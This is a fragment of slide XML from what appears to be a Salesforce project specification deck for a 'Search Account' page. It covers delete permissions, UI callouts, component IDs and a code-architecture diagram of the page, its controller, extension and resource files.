          <a:ext cx="6667500" cy="887413"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1333500"/>
                <a:gridCol w="1236663"/>
                <a:gridCol w="1579562"/>
                <a:gridCol w="841375"/>
                <a:gridCol w="533400"/>
              </a:tblGrid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CurrentUser is UCI</a:t>
                      </a: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CurrentUser is in the Quote BU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Current User is the Opportunity Owner</a:t>
                      </a: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Can Delete ?</a:t>
                      </a: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Verification date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Tested by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x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always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x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Only if Quote is Products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ヒラギノ角ゴ ProN W3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ヒラギノ角ゴ ProN W3"/>
                        </a:rPr>
                        <a:t>x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/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Always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Arial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30000"/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:endParaRPr kumimoji="0" lang="fr-F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ヒラギノ角ゴ ProN W3"/>
                        <a:cs typeface="Arial" pitchFamily="34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609600" y="2184400"/>
            <a:ext cx="8035925" cy="22860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&lt;PAD/Spec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Presentation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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AP12 Code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1371600" y="2209800"/>
            <a:ext cx="62484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Space left empty.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Will receive the final code after development.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 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UI – Screenshot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="343046" name="Picture 6" descr="C:\DOCUME~1\sbin\LOCALS~1\Temp\SNAGHTML528bb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048000"/>
            <a:ext cx="6943725" cy="15716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C:\DOCUME~1\sbin\LOCALS~1\Temp\SNAGHTML528bb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6943725" cy="15716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 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UI - Details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3581400" y="3025775"/>
            <a:ext cx="533400" cy="349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1447" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="3048000"/>
            <a:ext cx="1573213" cy="349250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400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1448" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1981200"/>
            <a:ext cx="2047875" cy="312738"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36546"/>
              <a:gd name="adj2" fmla="val 103722"/>
              <a:gd name="adj3" fmla="val 394926"/>
              <a:gd name="adj4" fmla="val 117907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Search box</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61449" name="AutoShape 32"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="1828800"/>
            <a:ext cx="2438400" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25264"/>
              <a:gd name="adj2" fmla="val -4759"/>
              <a:gd name="adj3" fmla="val 197083"/>
              <a:gd name="adj4" fmla="val -63912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Search button : search for accounts matching the text set in the search box</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61450" name="Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="3325813"/>
            <a:ext cx="6781800" cy="903287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0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lang="fr-FR"/>
              <a:t>   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61451" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="4298950"/>
            <a:ext cx="1143000" cy="349250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF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1452" name="AutoShape 36"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="5257800"/>
            <a:ext cx="1333500" cy="881063"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4324"/>
              <a:gd name="adj2" fmla="val -11431"/>
              <a:gd name="adj3" fmla="val -100185"/>
              <a:gd name="adj4" fmla="val 22028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Go to the homepage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61453" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="5334000"/>
            <a:ext cx="2209800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28426"/>
              <a:gd name="adj2" fmla="val -6667"/>
              <a:gd name="adj3" fmla="val -231519"/>
              <a:gd name="adj4" fmla="val -42852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>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="800"/>
              <a:t>List of the accounts matching the text set in the search box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 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UI - IDs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 6" descr="C:\DOCUME~1\sbin\LOCALS~1\Temp\SNAGHTML528bb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048000"/>
            <a:ext cx="6943725" cy="15716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3581400" y="3025775"/>
            <a:ext cx="533400" cy="349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2471" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="3048000"/>
            <a:ext cx="1573213" cy="349250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400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2472" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1981200"/>
            <a:ext cx="2047875" cy="312738"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36546"/>
              <a:gd name="adj2" fmla="val 103722"/>
              <a:gd name="adj3" fmla="val 394926"/>
              <a:gd name="adj4" fmla="val 117907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VIS08_SearchBox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800"/>
              <a:t>GET SET searchWord</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62473" name="AutoShape 32"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="1828800"/>
            <a:ext cx="2438400" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25264"/>
              <a:gd name="adj2" fmla="val -4759"/>
              <a:gd name="adj3" fmla="val 197083"/>
              <a:gd name="adj4" fmla="val -63912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VIS08_SearchButton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800"/>
              <a:t>ACTION searchAction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62474" name="Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="3325813"/>
            <a:ext cx="6781800" cy="903287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0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lang="fr-FR"/>
              <a:t>   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62475" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="4298950"/>
            <a:ext cx="1143000" cy="349250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF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lIns="36000" tIns="36000" rIns="36000" bIns="36000" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62476" name="AutoShape 36"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="5257800"/>
            <a:ext cx="2133600" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4324"/>
              <a:gd name="adj2" fmla="val -11431"/>
              <a:gd name="adj3" fmla="val -100185"/>
              <a:gd name="adj4" fmla="val 22028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algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="800"/>
              <a:t>VIS08_PageRef1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800"/>
              <a:t>PAGEREFERENCE homePage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62477" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="5334000"/>
            <a:ext cx="2209800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28426"/>
              <a:gd name="adj2" fmla="val -6667"/>
              <a:gd name="adj3" fmla="val -231519"/>
              <a:gd name="adj4" fmla="val -42852"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="3087D1">
                  <a:alpha val="46999"/>
                </a:srgb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 type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="36000" tIns="36000" rIns="36000" bIns="36000" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="800"/>
              <a:t>VIS08_MainPageBlockTable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="800"/>
              <a:t>GET SET AccountList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contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509588" y="1447800"/>
            <a:ext cx="8177212" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The page is accessed from : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The “Search Account” button on the Account detail page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The “Search Account” custom tab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parameters provided to the page are :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>retURL : previous URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR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Context and parameters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="4957763"/>
            <a:ext cx="1933575" cy="604837"/>
            <a:chOff x="3866" y="2678"/>
            <a:chExt cx="1743" cy="643"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64540" name="AutoShape 5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FF9900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41" name="Rectangle 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4005" y="2707"/>
              <a:ext cx="147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Page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V08_page1.page</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="64515" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="1949450"/>
            <a:ext cx="1931988" cy="604838"/>
            <a:chOff x="3866" y="2678"/>
            <a:chExt cx="1743" cy="643"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64538" name="AutoShape 11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009900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39" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4038" y="2707"/>
              <a:ext cx="141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Controller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V08.cls</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="64516" name="Group 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5307013" y="3581400"/>
            <a:ext cx="1931987" cy="604838"/>
            <a:chOff x="3866" y="2678"/>
            <a:chExt cx="1743" cy="643"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64536" name="AutoShape 14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3366FF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37" name="Rectangle 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4036" y="2707"/>
              <a:ext cx="1428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Extension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Utils.cls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248400" y="4957703"/>
            <a:ext cx="1933575" cy="604896"/>
            <a:chOff x="3866" y="2678"/>
            <a:chExt cx="1743" cy="643"/>
          </a:xfr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322575" name="AutoShape 20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22576" name="Rectangle 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4060" y="2707"/>
              <a:ext cx="1360" cy="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fr-FR" sz="1600" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Component</a:t>
              </a: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fr-FR" sz="1600" i="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>V08.component</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="64518" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3581400"/>
            <a:ext cx="1931988" cy="604838"/>
            <a:chOff x="3866" y="2678"/>
            <a:chExt cx="1743" cy="643"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64534" name="AutoShape 27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35" name="Rectangle 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4000" y="2707"/>
              <a:ext cx="15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Ressource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myPic.png</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="64519" name="Group 32"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5307013" y="1949450"/>
            <a:ext cx="1931987" cy="604838"/>
            <a:chOff x="3866" y="2678"/>
            <a:chExt cx="1743" cy="643"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64532" name="AutoShape 33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33" name="Rectangle 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4172" y="2707"/>
              <a:ext cx="115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Apex Class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Main_Org.cls</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="64520" name="Group 45"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1949450"/>
            <a:ext cx="1931988" cy="604838"/>
            <a:chOff x="3866" y="2678"/>
            <a:chExt cx="1743" cy="643"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64530" name="AutoShape 46"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3866" y="2678"/>
              <a:ext cx="1743" cy="6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endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64531" name="Rectangle 47"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4000" y="2707"/>
              <a:ext cx="1500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Ressource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myCSSfile.css</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="645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3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Code architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64524" name="AutoShape 43"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="64532" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5718969" y="3107532"/>
            <a:ext cx="110807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5" name="AutoShape 40"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="64536" idx="2"/>
            <a:endCxn id="64540" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4938713" y="3924300"/>
            <a:ext cx="1073150" cy="15970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6" name="AutoShape 40"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="5445920" y="3793331"/>
            <a:ext cx="36512" cy="3502025"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -162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7" name="AutoShape 40"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="64534" idx="2"/>
            <a:endCxn id="64540" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1431925" y="3948113"/>
            <a:ext cx="1073150" cy="1549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8" name="AutoShape 40"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="64530" idx="3"/>
            <a:endCxn id="64540" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2160588" y="2252663"/>
            <a:ext cx="582612" cy="30067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9" name="AutoShape 43"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="64538" idx="2"/>
            <a:endCxn id="64540" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2507456" y="3755232"/>
            <a:ext cx="24034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57"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6777038" y="3657600"/>
            <a:ext cx="2159000" cy="693738"/>
            <a:chOff x="3905" y="2784"/>
            <a:chExt cx="1665" cy="437"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65562" name="AutoShape 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3905" y="2784"/>
              <a:ext cx="1665" cy="4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009900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r>
                <a:rPr lang="fr-FR"/>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65563" name="Rectangle 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4138" y="2824"/>
              <a:ext cx="12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Controller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V08.cls</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="65539" name="Group 58"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="220663" y="3657600"/>
            <a:ext cx="2159000" cy="693738"/>
            <a:chOff x="3905" y="2784"/>
            <a:chExt cx="1665" cy="437"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65560" name="AutoShape 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3905" y="2784"/>
              <a:ext cx="1665" cy="4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FF9900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r>
                <a:rPr lang="fr-FR"/>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65561" name="Rectangle 60"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4111" y="2823"/>
              <a:ext cx="125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Visual Page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600" i="1"/>
                <a:t>V08_page1.page</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65540" name="AutoShape 62"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3014663" y="5816600"/>
            <a:ext cx="319405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73000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3087D1">
                  <a:alpha val="74001"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fr-FR"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65541" name="Rectangle 63"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3001963" y="5995988"/>
            <a:ext cx="32178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/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600"/>
              <a:t>PageReference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1000"/>
              <a:t>homePage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="65542" name="Group 74"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2981325" y="3087688"/>
            <a:ext cx="3225800" cy="693737"/>
            <a:chOff x="2210" y="1647"/>
            <a:chExt cx="1138" cy="437"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65558" name="AutoShape 65"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2222" y="1647"/>
              <a:ext cx="1126" cy="4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73000"/>
                  </a:schemeClr>
                </a:gs>
